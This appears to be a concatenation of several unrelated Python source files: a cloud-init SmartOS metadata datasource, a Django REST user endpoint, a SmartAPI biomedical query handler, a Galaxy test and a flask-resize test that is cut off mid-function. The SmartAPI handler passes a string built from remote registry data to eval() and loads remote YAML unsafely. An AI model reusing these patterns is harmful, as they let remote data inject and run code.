# Datasource for provisioning on SmartOS. This works on Joyent
# and public/private Clouds using SmartOS.
#
# SmartOS hosts use a serial console (/dev/ttyS1) on KVM Linux Guests
# The meta-data is transmitted via key/value pairs made by
# requests on the console. For example, to get the hostname, you
# would send "GET hostname" on /dev/ttyS1.
# For Linux Guests running in LX-Brand Zones on SmartOS hosts
# a socket (/native/.zonecontrol/metadata.sock) is used instead
# of a serial console.
#
# Certain behavior is defined by the DataDictionary
# http://us-east.manta.joyent.com/jmc/public/mdata/datadict.html
# Comments with "@datadictionary" are snippets of the definition
import base64
import binascii
import json
import os
import random
import re
import socket
from cloudinit import log as logging
from cloudinit import serial
from cloudinit import sources
from cloudinit import util
LOG = logging.getLogger(__name__)
SMARTOS_ATTRIB_MAP = {
# Cloud-init Key : (SmartOS Key, Strip line endings)
'instance-id': ('sdc:uuid', True),
'local-hostname': ('hostname', True),
'public-keys': ('root_authorized_keys', True),
'user-script': ('user-script', False),
'legacy-user-data': ('user-data', False),
'user-data': ('cloud-init:user-data', False),
'iptables_disable': ('iptables_disable', True),
'motd_sys_info': ('motd_sys_info', True),
'availability_zone': ('sdc:datacenter_name', True),
'vendor-data': ('sdc:vendor-data', False),
'operator-script': ('sdc:operator-script', False),
'hostname': ('sdc:hostname', True),
'dns_domain': ('sdc:dns_domain', True),
}
SMARTOS_ATTRIB_JSON = {
# Cloud-init Key : (SmartOS Key known JSON)
'network-data': 'sdc:nics',
'dns_servers': 'sdc:resolvers',
'routes': 'sdc:routes',
}
SMARTOS_ENV_LX_BRAND = "lx-brand"
SMARTOS_ENV_KVM = "kvm"
DS_NAME = 'SmartOS'
DS_CFG_PATH = ['datasource', DS_NAME]
NO_BASE64_DECODE = [
'iptables_disable',
'motd_sys_info',
'root_authorized_keys',
'sdc:datacenter_name',
'sdc:uuid'
'user-data',
'user-script',
]
METADATA_SOCKFILE = '/native/.zonecontrol/metadata.sock'
SERIAL_DEVICE = '/dev/ttyS1'
SERIAL_TIMEOUT = 60
# BUILT-IN DATASOURCE CONFIGURATION
# The following is the built-in configuration. If the values
# are not set via the system configuration, then these default
# will be used:
# serial_device: which serial device to use for the meta-data
# serial_timeout: how long to wait on the device
# no_base64_decode: values which are not base64 encoded and
# are fetched directly from SmartOS, not meta-data values
# base64_keys: meta-data keys that are delivered in base64
# base64_all: with the exclusion of no_base64_decode values,
# treat all meta-data as base64 encoded
# disk_setup: describes how to partition the ephemeral drive
# fs_setup: describes how to format the ephemeral drive
#
BUILTIN_DS_CONFIG = {
'serial_device': SERIAL_DEVICE,
'serial_timeout': SERIAL_TIMEOUT,
'metadata_sockfile': METADATA_SOCKFILE,
'no_base64_decode': NO_BASE64_DECODE,
'base64_keys': [],
'base64_all': False,
'disk_aliases': {'ephemeral0': '/dev/vdb'},
}
BUILTIN_CLOUD_CONFIG = {
'disk_setup': {
'ephemeral0': {'table_type': 'mbr',
'layout': False,
'overwrite': False}
},
'fs_setup': [{'label': 'ephemeral0',
'filesystem': 'ext3',
'device': 'ephemeral0'}],
}
# builtin vendor-data is a boothook that writes a script into
# /var/lib/cloud/scripts/per-boot. *That* script then handles
# executing the 'operator-script' and 'user-script' files
# that cloud-init writes into /var/lib/cloud/instance/data/
# if they exist.
#
# This is all very indirect, but it's done like this so that at
# some point in the future, perhaps cloud-init wouldn't do it at
# all, but rather the vendor would actually provide vendor-data that accomplishes
# their desires. (That is the point of vendor-data).
#
# cloud-init does cheat a bit, and write the operator-script and user-script
# itself. It could have the vendor-script do that, but it seems better
# to not require the image to contain a tool (mdata-get) to read those
# keys when we have a perfectly good one inside cloud-init.
BUILTIN_VENDOR_DATA = """\
#cloud-boothook
#!/bin/sh
fname="%(per_boot_d)s/01_smartos_vendor_data.sh"
mkdir -p "${fname%%/*}"
cat > "$fname" <<"END_SCRIPT"
#!/bin/sh
##
# This file is written as part of the default vendor data for SmartOS.
# The SmartOS datasource writes the listed file from the listed metadata key
# sdc:operator-script -> %(operator_script)s
# user-script -> %(user_script)s
#
# You can view content with 'mdata-get <key>'
#
for script in "%(operator_script)s" "%(user_script)s"; do
[ -x "$script" ] || continue
echo "executing '$script'" 1>&2
"$script"
done
END_SCRIPT
chmod +x "$fname"
"""
# @datadictionary: this is legacy path for placing files from metadata
# per the SmartOS location. It is not preferable, but is done for
# legacy reasons
LEGACY_USER_D = "/var/db"
class DataSourceSmartOS(sources.DataSource):
_unset = "_unset"
smartos_type = _unset
md_client = _unset
def __init__(self, sys_cfg, distro, paths):
sources.DataSource.__init__(self, sys_cfg, distro, paths)
self.ds_cfg = util.mergemanydict([
self.ds_cfg,
util.get_cfg_by_path(sys_cfg, DS_CFG_PATH, {}),
BUILTIN_DS_CONFIG])
self.metadata = {}
self.network_data = None
self._network_config = None
self.script_base_d = os.path.join(self.paths.get_cpath("scripts"))
self._init()
def __str__(self):
root = sources.DataSource.__str__(self)
return "%s [client=%s]" % (root, self.md_client)
def _init(self):
if self.smartos_type == self._unset:
self.smartos_type = get_smartos_environ()
if self.smartos_type is None:
self.md_client = None
if self.md_client == self._unset:
self.md_client = jmc_client_factory(
smartos_type=self.smartos_type,
metadata_sockfile=self.ds_cfg['metadata_sockfile'],
serial_device=self.ds_cfg['serial_device'],
serial_timeout=self.ds_cfg['serial_timeout'])
def _set_provisioned(self):
'''Mark the instance provisioning state as successful.
When run in a zone, the host OS will look for /var/svc/provisioning
to be renamed as /var/svc/provision_success. This should be done
after meta-data is successfully retrieved and from this point
the host considers the provision of the zone to be a success and
keeps the zone running.
'''
LOG.debug('Instance provisioning state set as successful')
svc_path = '/var/svc'
if os.path.exists('/'.join([svc_path, 'provisioning'])):
os.rename('/'.join([svc_path, 'provisioning']),
'/'.join([svc_path, 'provision_success']))
def get_data(self):
self._init()
md = {}
ud = ""
if not self.smartos_type:
LOG.debug("Not running on smartos")
return False
if not self.md_client.exists():
LOG.debug("No metadata device '%r' found for SmartOS datasource",
self.md_client)
return False
for ci_noun, attribute in SMARTOS_ATTRIB_MAP.items():
smartos_noun, strip = attribute
md[ci_noun] = self.md_client.get(smartos_noun, strip=strip)
for ci_noun, smartos_noun in SMARTOS_ATTRIB_JSON.items():
md[ci_noun] = self.md_client.get_json(smartos_noun)
# @datadictionary: This key may contain a program that is written
# to a file in the filesystem of the guest on each boot and then
# executed. It may be of any format that would be considered
# executable in the guest instance.
#
# We write 'user-script' and 'operator-script' into the
# instance/data directory. The default vendor-data then handles
# executing them later.
data_d = os.path.join(self.paths.get_cpath(), 'instances',
md['instance-id'], 'data')
user_script = os.path.join(data_d, 'user-script')
u_script_l = "%s/user-script" % LEGACY_USER_D
write_boot_content(md.get('user-script'), content_f=user_script,
link=u_script_l, shebang=True, mode=0o700)
operator_script = os.path.join(data_d, 'operator-script')
write_boot_content(md.get('operator-script'),
content_f=operator_script, shebang=False,
mode=0o700)
# @datadictionary: This key has no defined format, but its value
# is written to the file /var/db/mdata-user-data on each boot prior
# to the phase that runs user-script. This file is not to be executed.
# This allows a configuration file of some kind to be injected into
# the machine to be consumed by the user-script when it runs.
u_data = md.get('legacy-user-data')
u_data_f = "%s/mdata-user-data" % LEGACY_USER_D
write_boot_content(u_data, u_data_f)
# Handle the cloud-init regular meta
if not md['local-hostname']:
md['local-hostname'] = md['instance-id']
ud = None
if md['user-data']:
ud = md['user-data']
if not md['vendor-data']:
md['vendor-data'] = BUILTIN_VENDOR_DATA % {
'user_script': user_script,
'operator_script': operator_script,
'per_boot_d': os.path.join(self.paths.get_cpath("scripts"),
'per-boot'),
}
self.metadata = util.mergemanydict([md, self.metadata])
self.userdata_raw = ud
self.vendordata_raw = md['vendor-data']
self.network_data = md['network-data']
self._set_provisioned()
return True
def device_name_to_device(self, name):
return self.ds_cfg['disk_aliases'].get(name)
def get_config_obj(self):
if self.smartos_type == SMARTOS_ENV_KVM:
return BUILTIN_CLOUD_CONFIG
return {}
def get_instance_id(self):
return self.metadata['instance-id']
@property
def network_config(self):
if self._network_config is None:
if self.network_data is not None:
self._network_config = (
convert_smartos_network_data(
network_data=self.network_data,
dns_servers=self.metadata['dns_servers'],
dns_domain=self.metadata['dns_domain']))
return self._network_config
class JoyentMetadataFetchException(Exception):
pass
class JoyentMetadataClient(object):
"""
A client implementing v2 of the Joyent Metadata Protocol Specification.
The full specification can be found at
http://eng.joyent.com/mdata/protocol.html
"""
line_regex = re.compile(
r'V2 (?P<length>\d+) (?P<checksum>[0-9a-f]+)'
r' (?P<body>(?P<request_id>[0-9a-f]+) (?P<status>SUCCESS|NOTFOUND)'
r'( (?P<payload>.+))?)')
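    # Illustrative frame layout (the spec linked above is authoritative):
    #   request:  "V2 <body-len> <crc32-of-body> <request-id> <TYPE> [<base64-param>]\n"
    #   response: "V2 <body-len> <crc32-of-body> <request-id> SUCCESS|NOTFOUND [<payload>]\n"
    # <body-len> and the checksum both cover everything after the checksum field.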
def __init__(self, smartos_type=None, fp=None):
if smartos_type is None:
smartos_type = get_smartos_environ()
self.smartos_type = smartos_type
self.fp = fp
def _checksum(self, body):
return '{0:08x}'.format(
binascii.crc32(body.encode('utf-8')) & 0xffffffff)
def _get_value_from_frame(self, expected_request_id, frame):
frame_data = self.line_regex.match(frame).groupdict()
if int(frame_data['length']) != len(frame_data['body']):
raise JoyentMetadataFetchException(
'Incorrect frame length given ({0} != {1}).'.format(
frame_data['length'], len(frame_data['body'])))
expected_checksum = self._checksum(frame_data['body'])
if frame_data['checksum'] != expected_checksum:
raise JoyentMetadataFetchException(
'Invalid checksum (expected: {0}; got {1}).'.format(
expected_checksum, frame_data['checksum']))
if frame_data['request_id'] != expected_request_id:
raise JoyentMetadataFetchException(
'Request ID mismatch (expected: {0}; got {1}).'.format(
expected_request_id, frame_data['request_id']))
if not frame_data.get('payload', None):
LOG.debug('No value found.')
return None
value = util.b64d(frame_data['payload'])
LOG.debug('Value "%s" found.', value)
return value
def request(self, rtype, param=None):
request_id = '{0:08x}'.format(random.randint(0, 0xffffffff))
message_body = ' '.join((request_id, rtype,))
if param:
message_body += ' ' + base64.b64encode(param.encode()).decode()
msg = 'V2 {0} {1} {2}\n'.format(
len(message_body), self._checksum(message_body), message_body)
LOG.debug('Writing "%s" to metadata transport.', msg)
need_close = False
if not self.fp:
self.open_transport()
need_close = True
self.fp.write(msg.encode('ascii'))
self.fp.flush()
response = bytearray()
response.extend(self.fp.read(1))
while response[-1:] != b'\n':
response.extend(self.fp.read(1))
if need_close:
self.close_transport()
response = response.rstrip().decode('ascii')
LOG.debug('Read "%s" from metadata transport.', response)
if 'SUCCESS' not in response:
return None
value = self._get_value_from_frame(request_id, response)
return value
def get(self, key, default=None, strip=False):
result = self.request(rtype='GET', param=key)
if result is None:
return default
if result and strip:
result = result.strip()
return result
def get_json(self, key, default=None):
result = self.get(key, default=default)
if result is None:
return default
return json.loads(result)
def list(self):
result = self.request(rtype='KEYS')
if result:
result = result.split('\n')
return result
def put(self, key, val):
param = b' '.join([base64.b64encode(i.encode())
for i in (key, val)]).decode()
return self.request(rtype='PUT', param=param)
def delete(self, key):
return self.request(rtype='DELETE', param=key)
def close_transport(self):
if self.fp:
self.fp.close()
self.fp = None
def __enter__(self):
if self.fp:
return self
self.open_transport()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close_transport()
return
def open_transport(self):
raise NotImplementedError
class JoyentMetadataSocketClient(JoyentMetadataClient):
def __init__(self, socketpath, smartos_type=SMARTOS_ENV_LX_BRAND):
super(JoyentMetadataSocketClient, self).__init__(smartos_type)
self.socketpath = socketpath
def open_transport(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.socketpath)
self.fp = sock.makefile('rwb')
def exists(self):
return os.path.exists(self.socketpath)
def __repr__(self):
return "%s(socketpath=%s)" % (self.__class__.__name__, self.socketpath)
class JoyentMetadataSerialClient(JoyentMetadataClient):
def __init__(self, device, timeout=10, smartos_type=SMARTOS_ENV_KVM):
super(JoyentMetadataSerialClient, self).__init__(smartos_type)
self.device = device
self.timeout = timeout
def exists(self):
return os.path.exists(self.device)
def open_transport(self):
ser = serial.Serial(self.device, timeout=self.timeout)
if not ser.isOpen():
raise SystemError("Unable to open %s" % self.device)
self.fp = ser
def __repr__(self):
return "%s(device=%s, timeout=%s)" % (
self.__class__.__name__, self.device, self.timeout)
class JoyentMetadataLegacySerialClient(JoyentMetadataSerialClient):
"""V1 of the protocol was not safe for all values.
Thus, we allowed the user to pass values in as base64 encoded.
Users may still reasonably expect to be able to send base64 data
and have it transparently decoded. So even though the V2 format is
now used, and is safe (using base64 itself), we keep legacy support.
The way for a user to do this was:
a.) specify 'base64_keys' key whose value is a comma delimited
list of keys that were base64 encoded.
b.) base64_all: string interpreted as a boolean that indicates
if all keys are base64 encoded.
c.) set a key named b64-<keyname> with a boolean indicating that
<keyname> is base64 encoded."""
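    # Illustrative metadata conventions handled below (hypothetical keys/values):
    #   base64_all  = "true"     -> every value not in NO_BASE64_DECODE is decoded
    #   base64_keys = "foo,bar"  -> only 'foo' and 'bar' are decoded
    #   b64-foo     = "true"     -> 'foo' is decoded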
def __init__(self, device, timeout=10, smartos_type=None):
s = super(JoyentMetadataLegacySerialClient, self)
s.__init__(device, timeout, smartos_type)
self.base64_keys = None
self.base64_all = None
def _init_base64_keys(self, reset=False):
if reset:
self.base64_keys = None
self.base64_all = None
keys = None
if self.base64_all is None:
keys = self.list()
if 'base64_all' in keys:
self.base64_all = util.is_true(self._get("base64_all"))
else:
self.base64_all = False
if self.base64_all:
# short circuit if base64_all is true
return
if self.base64_keys is None:
if keys is None:
keys = self.list()
b64_keys = set()
if 'base64_keys' in keys:
b64_keys = set(self._get("base64_keys").split(","))
# now add any b64-<keyname> that has a true value
for key in [k[3:] for k in keys if k.startswith("b64-")]:
if util.is_true(self._get(key)):
b64_keys.add(key)
else:
if key in b64_keys:
b64_keys.remove(key)
self.base64_keys = b64_keys
def _get(self, key, default=None, strip=False):
return (super(JoyentMetadataLegacySerialClient, self).
get(key, default=default, strip=strip))
def is_b64_encoded(self, key, reset=False):
if key in NO_BASE64_DECODE:
return False
self._init_base64_keys(reset=reset)
if self.base64_all:
return True
return key in self.base64_keys
def get(self, key, default=None, strip=False):
mdefault = object()
val = self._get(key, strip=False, default=mdefault)
if val is mdefault:
return default
if self.is_b64_encoded(key):
try:
val = base64.b64decode(val.encode()).decode()
# Bogus input produces different errors in Python 2 and 3
except (TypeError, binascii.Error):
LOG.warn("Failed base64 decoding key '%s': %s", key, val)
if strip:
val = val.strip()
return val
def jmc_client_factory(
smartos_type=None, metadata_sockfile=METADATA_SOCKFILE,
serial_device=SERIAL_DEVICE, serial_timeout=SERIAL_TIMEOUT,
uname_version=None):
if smartos_type is None:
smartos_type = get_smartos_environ(uname_version)
if smartos_type is None:
return None
elif smartos_type == SMARTOS_ENV_KVM:
return JoyentMetadataLegacySerialClient(
device=serial_device, timeout=serial_timeout,
smartos_type=smartos_type)
elif smartos_type == SMARTOS_ENV_LX_BRAND:
return JoyentMetadataSocketClient(socketpath=metadata_sockfile,
smartos_type=smartos_type)
raise ValueError("Unknown value for smartos_type: %s" % smartos_type)
def write_boot_content(content, content_f, link=None, shebang=False,
mode=0o400):
"""
Write the content to content_f. Under the following rules:
1. If no content, remove the file
2. Write the content
3. If executable and no file magic, add it
4. If there is a link, create it
@param content: what to write
@param content_f: the file name
@param link: if defined, location to create a symlink to
@param shebang: if no file magic, set shebang
@param mode: file mode
    Because of the way that cloud-init executes scripts (no shell),
    a script will fail to execute if it does not have a magic bit (shebang) set
    for the file. If shebang=True, the script is checked for a magic bit and,
    if none is found, the SmartOS default of bash is prepended.
"""
if not content and os.path.exists(content_f):
os.unlink(content_f)
if link and os.path.islink(link):
os.unlink(link)
if not content:
return
util.write_file(content_f, content, mode=mode)
if shebang and not content.startswith("#!"):
try:
cmd = ["file", "--brief", "--mime-type", content_f]
(f_type, _err) = util.subp(cmd)
LOG.debug("script %s mime type is %s", content_f, f_type)
if f_type.strip() == "text/plain":
new_content = "\n".join(["#!/bin/bash", content])
util.write_file(content_f, new_content, mode=mode)
LOG.debug("added shebang to file %s", content_f)
except Exception as e:
util.logexc(LOG, ("Failed to identify script type for %s" %
content_f, e))
if link:
try:
if os.path.islink(link):
os.unlink(link)
if content and os.path.exists(content_f):
util.ensure_dir(os.path.dirname(link))
os.symlink(content_f, link)
except IOError as e:
util.logexc(LOG, "failed establishing content link: %s", e)
def get_smartos_environ(uname_version=None, product_name=None):
uname = os.uname()
# SDC LX-Brand Zones lack dmidecode (no /dev/mem) but
# report 'BrandZ virtual linux' as the kernel version
if uname_version is None:
uname_version = uname[3]
if uname_version.lower() == 'brandz virtual linux':
return SMARTOS_ENV_LX_BRAND
if product_name is None:
system_type = util.read_dmi_data("system-product-name")
else:
system_type = product_name
if system_type and 'smartdc' in system_type.lower():
return SMARTOS_ENV_KVM
return None
# Convert SMARTOS 'sdc:nics' data to network_config yaml
def convert_smartos_network_data(network_data=None,
dns_servers=None, dns_domain=None):
"""Return a dictionary of network_config by parsing provided
SMARTOS sdc:nics configuration data
sdc:nics data is a dictionary of properties of a nic and the ip
configuration desired. Additional nic dictionaries are appended
to the list.
Converting the format is straightforward though it does include
duplicate information as well as data which appears to be relevant
to the hostOS rather than the guest.
For each entry in the nics list returned from query sdc:nics, we
create a type: physical entry, and extract the interface properties:
'mac' -> 'mac_address', 'mtu', 'interface' -> 'name'. The remaining
keys are related to ip configuration. For each ip in the 'ips' list
we create a subnet entry under 'subnets' pairing the ip to a one in
the 'gateways' list.
"""
valid_keys = {
'physical': [
'mac_address',
'mtu',
'name',
'params',
'subnets',
'type',
],
'subnet': [
'address',
'broadcast',
'dns_nameservers',
'dns_search',
'metric',
'pointopoint',
'routes',
'scope',
'type',
],
}
if dns_servers:
if not isinstance(dns_servers, (list, tuple)):
dns_servers = [dns_servers]
else:
dns_servers = []
if dns_domain:
if not isinstance(dns_domain, (list, tuple)):
dns_domain = [dns_domain]
else:
dns_domain = []
def is_valid_ipv4(addr):
return '.' in addr
def is_valid_ipv6(addr):
return ':' in addr
pgws = {
'ipv4': {'match': is_valid_ipv4, 'gw': None},
'ipv6': {'match': is_valid_ipv6, 'gw': None},
}
config = []
for nic in network_data:
cfg = dict((k, v) for k, v in nic.items()
if k in valid_keys['physical'])
cfg.update({
'type': 'physical',
'name': nic['interface']})
if 'mac' in nic:
cfg.update({'mac_address': nic['mac']})
subnets = []
for ip in nic.get('ips', []):
if ip == "dhcp":
subnet = {'type': 'dhcp4'}
else:
subnet = dict((k, v) for k, v in nic.items()
if k in valid_keys['subnet'])
subnet.update({
'type': 'static',
'address': ip,
})
proto = 'ipv4' if is_valid_ipv4(ip) else 'ipv6'
# Only use gateways for 'primary' nics
if 'primary' in nic and nic.get('primary', False):
# the ips and gateways list may be N to M, here
# we map the ip index into the gateways list,
# and handle the case that we could have more ips
# than gateways. we only consume the first gateway
if not pgws[proto]['gw']:
gateways = [gw for gw in nic.get('gateways', [])
if pgws[proto]['match'](gw)]
if len(gateways):
pgws[proto]['gw'] = gateways[0]
subnet.update({'gateway': pgws[proto]['gw']})
subnets.append(subnet)
cfg.update({'subnets': subnets})
config.append(cfg)
if dns_servers:
config.append(
{'type': 'nameserver', 'address': dns_servers,
'search': dns_domain})
return {'version': 1, 'config': config}
# Used to match classes to dependencies
datasources = [
(DataSourceSmartOS, (sources.DEP_FILESYSTEM, )),
]
# Return a list of data sources that match this set of dependencies
def get_datasource_list(depends):
return sources.list_from_depends(depends, datasources)
if __name__ == "__main__":
import sys
jmc = jmc_client_factory()
if jmc is None:
print("Do not appear to be on smartos.")
sys.exit(1)
if len(sys.argv) == 1:
keys = (list(SMARTOS_ATTRIB_JSON.keys()) +
list(SMARTOS_ATTRIB_MAP.keys()) + ['network_config'])
else:
keys = sys.argv[1:]
def load_key(client, key, data):
if key in data:
return data[key]
if key in SMARTOS_ATTRIB_JSON:
keyname = SMARTOS_ATTRIB_JSON[key]
data[key] = client.get_json(keyname)
elif key == "network_config":
for depkey in ('network-data', 'dns_servers', 'dns_domain'):
load_key(client, depkey, data)
data[key] = convert_smartos_network_data(
network_data=data['network-data'],
dns_servers=data['dns_servers'],
dns_domain=data['dns_domain'])
else:
if key in SMARTOS_ATTRIB_MAP:
keyname, strip = SMARTOS_ATTRIB_MAP[key]
else:
keyname, strip = (key, False)
data[key] = client.get(keyname, strip=strip)
return data[key]
data = {}
for key in keys:
load_key(client=jmc, key=key, data=data)
print(json.dumps(data, indent=1, sort_keys=True,
separators=(',', ': ')))
| prometheanfire/cloud-init | cloudinit/sources/DataSourceSmartOS.py | Python | gpl-3.0 | 29,325 | 0 |
#
# CDR-Stats License
# http://www.cdr-stats.org
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (C) 2011-2015 Star2Billing S.L.
#
# The Initial Developer of the Original Code is
# Arezqui Belaid <info@star2billing.com>
#
from django.contrib.auth.models import User
from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework.authentication import BasicAuthentication, SessionAuthentication
from rest_framework import viewsets
from apirest.user_serializers import UserSerializer
#from permissions import CustomObjectPermissions
class UserViewSet(viewsets.ReadOnlyModelViewSet):
"""
API endpoint that allows users to be viewed or edited.
"""
queryset = User.objects.all()
serializer_class = UserSerializer
    authentication_classes = (BasicAuthentication, SessionAuthentication)
permission_classes = (IsAuthenticatedOrReadOnly, )
| Star2Billing/cdr-stats | cdr_stats/apirest/view_user.py | Python | mpl-2.0 | 1,041 | 0.001921 |
import requests
import json
import yaml
import pandas as pd
import pprint
from jsonld_processor import jsonld2nquads, fetchvalue
from utils import int2str
class SmartAPIHandler:
def __init__(self):
# description info about endpoint, bioentity and api
self.endpoint_info = {}
self.bioentity_info = {}
self.api_info = {}
self.parse_id_mapping()
self.parse_openapi()
self.relation = {}
def find_base(self, d, relation={}):
for k, v in d.items():
if isinstance(v, dict) and "@context" in v and "@base" in v["@context"]:
if v["@context"]["@base"] not in relation:
relation[v["@context"]["@base"]] = [v["@id"]]
elif v["@context"]["@base"] in relation and v["@id"] not in relation[v["@context"]["@base"]]:
relation[v["@context"]["@base"]].append(v["@id"])
elif isinstance(v, dict):
self.find_base(v,relation=relation)
return relation
'''
    This function parses the jsonld context file and returns the relation info
'''
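    # Illustrative return value (hypothetical URIs and relation terms): each JSON-LD
    # "@base" URI maps to the list of "@id" terms seen for it, e.g.
    #   {'http://identifiers.org/ncbigene/': ['assoc:GeneID'],
    #    'http://identifiers.org/uniprot/': ['assoc:Uniprot', 'ont:is_related_to']}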
def context2relation(self, context_url):
context = requests.get(context_url).json()
return self.find_base(context, relation={})
'''
    This function parses the openapi yml file and organizes the info into endpoints and apis
'''
def parse_openapi(self):
api_list_url = 'https://raw.githubusercontent.com/NCATS-Tangerine/translator-api-registry/kevin/API_LIST.yml'
api_list = yaml.load(requests.get(api_list_url).content)['APIs']
# path to fetch openapi yml file for each api
metadata_url_prefix = "https://raw.githubusercontent.com/NCATS-Tangerine/translator-api-registry/kevin/"
for _api in api_list:
openapi_url = metadata_url_prefix + _api['metadata']
# check if the openapi file for the api exists first
if requests.get(openapi_url).status_code == 200:
# retrieve openapi file
openapi_file = requests.get(openapi_url).content
data = yaml.load(openapi_file)
self.api_info[data['info']['title']] = {'info': data['info'], 'servers': data['servers'], 'endpoints': []}
for _name, _info in data['paths'].items():
self.endpoint_info[data['servers'][0]['url'] + _name] = _info
_output = [_item['valueType'] for _item in _info['get']['responses']['200']['x-responseValueType']]
relation = {}
if 'x-JSONLDContext' in _info['get']['responses']['200']:
relation = self.context2relation(_info['get']['responses']['200']['x-JSONLDContext'])
for _op in _output:
if _op not in relation:
relation[_op] = ['ont:is_related_to']
self.endpoint_info[data['servers'][0]['url'] + _name].update({'output': _output, 'relation': relation})
self.api_info[data['info']['title']]['endpoints'].append(data['servers'][0]['url'] + _name)
else:
print("invalid url for openapi: {}".format(openapi_url))
'''
construct requests params/data, based on input type and value
only handle 'in' value which is body or query
'''
def api_call_constructor(self, uri, value, endpoint_name):
results = {}
method = type(value) == list and 'post' or 'get'
for _para in self.endpoint_info[endpoint_name][method]['parameters']:
# handle cases where input value is part of the url
if _para['in'] == 'path':
data = requests.get(endpoint_name.replace('{' + _para['name'] + '}', value))
return data
else:
# check whether the parameter is required
if _para['required']:
# if the para has a request template, then put value into the placeholder {{input}}
if 'x-requestTemplate' in _para:
for _template in _para['x-requestTemplate']:
if _template['valueType'] == 'default':
results[_para['name']] = _template['template'].replace('{{input}}', value)
elif uri == _template['valueType']:
results[_para['name']] = _template['template'].replace('{{input}}', value)
else:
results[_para['name']] = value
if type(value) != list:
data = requests.get(endpoint_name, params=results)
else:
data = requests.post(endpoint_name, data=results)
return data
'''
parse the uri_id mapping file, return a dict containing id mapping info indexed by uri
'''
def parse_id_mapping(self):
file_url = 'https://raw.githubusercontent.com/NCATS-Tangerine/translator-api-registry/kevin/ID_MAPPING.csv'
data = pd.read_csv(file_url, encoding = "ISO-8859-1")
for index, row in data.iterrows():
self.bioentity_info[row['URI']] = {'registry_identifier': row[2], 'alternative_names': row[3], 'description': row[4], 'identifier_pattern': row[5], 'preferred_name': row[1], 'type': row[6]}
return self.bioentity_info
'''
    fetch endpoint jsonld context information
'''
def fetch_context(self, endpoint_name):
file_url = self.endpoint_info[endpoint_name]['get']['responses']['200']['x-JSONLDContext']
return requests.get(file_url).json()
'''
    input: user provided input/output types
    output: endpoint(s) which can take the input and return the output
'''
def api_endpoint_locator(self, input, output):
endpoint_list = []
for _endpoint, _info in self.endpoint_info.items():
if input in _info['get']['parameters'][0]['x-valueType'] and output in _info['output']:
endpoint_list.append(_endpoint)
return endpoint_list
'''
make api calls based on input, endpoint
'''
def call_api(self, input, value, endpoint, output):
json_doc = self.api_call_constructor(input, value, endpoint).json()
int2str(json_doc)
if endpoint.startswith('http://myvariant.info/'):
if "_id" in json_doc:
json_doc["_id"] = json_doc["_id"].replace(':', '-')
elif "hits" in json_doc:
for _doc in json_doc["hits"]:
if "_id" in _doc:
_doc['_id'] = _doc['_id'].replace(":", "-")
output_type = self.bioentity_info[output]['type']
if output_type == 'Entity':
jsonld_context = self.fetch_context(endpoint)
json_doc.update(jsonld_context)
# parse output nquads
nquads = jsonld2nquads(json_doc)
outputs = list(set(fetchvalue(nquads, output)))
return (outputs,output_type)
else:
response = self.endpoint_info[endpoint]['get']['responses']['200']['x-responseValueType']
for _response in response:
if _response['valueType'] == output:
output_path = _response['path']
outputs_command = 'json_doc'
for _item in output_path.split('.'):
outputs_command += ('["' + _item + '"]')
outputs = eval(outputs_command)
return (outputs, output_type)
| kevinxin90/biothings_explorer_jupyter_notebook | api_handler.py | Python | apache-2.0 | 7,479 | 0.00361 |
import galaxy.model
from galaxy.model.orm import *
from base.twilltestcase import TwillTestCase
class TestMetadataEdit( TwillTestCase ):
def test_00_metadata_edit( self ):
"""test_metadata_edit: Testing metadata editing"""
self.logout()
self.login( email='test@bx.psu.edu' )
self.new_history( name='Test Metadata Edit' )
global history1
history1 = galaxy.model.History.query() \
.order_by( desc( galaxy.model.History.table.c.create_time ) ).first()
self.upload_file( '1.bed' )
latest_hda = galaxy.model.HistoryDatasetAssociation.query() \
.order_by( desc( galaxy.model.HistoryDatasetAssociation.table.c.create_time ) ).first()
self.home()
# Due to twill not being able to handle the permissions forms, we'll eliminate
# DefaultHistoryPermissions prior to uploading a dataset so that the permission
        # form will not be displayed on the edit attributes page.
for dp in latest_hda.dataset.actions:
dp.delete()
dp.flush()
latest_hda.dataset.refresh()
self.check_history_for_string( '1.bed' )
self.check_metadata_for_string( '1.bed uploaded file unspecified (\?) chromCol value="1" selected endCol value="3" is_strandCol value="true" checked', hid=1 )
"""test editing attributes"""
self.edit_hda_attribute_info( hda_id=str( latest_hda.id ),
new_name='Testdata',
new_info="Uploaded my file",
new_dbkey='hg16',
new_startcol='6' )
self.check_metadata_for_string( 'Testdata bed Uploaded my file hg16 "bed" selected="yes" "startCol" value="6" selected', hid=1 )
"""test Auto-detecting attributes"""
self.auto_detect_metadata( hda_id=str( latest_hda.id ) )
self.check_metadata_for_string('Testdata bed Uploaded my file hg16 "bed" selected="yes" "startCol" value="2" selected', hid=1 )
"""test converting formats"""
self.convert_format( hda_id=str( latest_hda.id ), target_type='gff' )
self.check_metadata_for_string( '"gff" selected="yes"', hid=1 )
"""test changing data type"""
self.change_datatype( hda_id=str( latest_hda.id ), datatype='gff3' )
self.check_metadata_for_string( 'gff3', hid=1 )
self.delete_history( id=str( history1.id ) )
self.logout()
| dbcls/dbcls-galaxy | test/functional/test_metadata_editing.py | Python | mit | 2,489 | 0.023303 |
import os
import subprocess
import pytest
import flask_resize
from .decorators import requires_redis, slow
@pytest.fixture
def env(tmpdir, redis_cache):
basedir = tmpdir
conffile = tmpdir.join('flask-resize-conf.py')
conffile.write(
"""
RESIZE_URL = 'https://example.com'
RESIZE_ROOT = '{root}'
RESIZE_REDIS_HOST = '{redis_host}'
RESIZE_REDIS_KEY = '{cache_key}'
"""
.format(
root=str(basedir).replace('\\', '\\\\'),
redis_host=redis_cache._host,
cache_key=redis_cache.key,
).strip()
)
env = os.environ.copy()
# env = dict(PATH=os.environ['PATH'])
env.update(FLASK_RESIZE_CONF=str(conffile))
return env
def run(env, *args):
return subprocess.check_output(args, env=env).decode().splitlines()
@slow
def test_bin_usage(env):
assert 'usage: flask-resize' in run(env, 'flask-resize', '--help')[0]
@slow
def test_bin_list_images_empty(env):
assert run(env, 'flask-resize', 'list', 'images') == []
@slow
def test_bin_list_has_images(
env,
resizetarget_opts,
image1_name,
image1_data,
image1_key
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
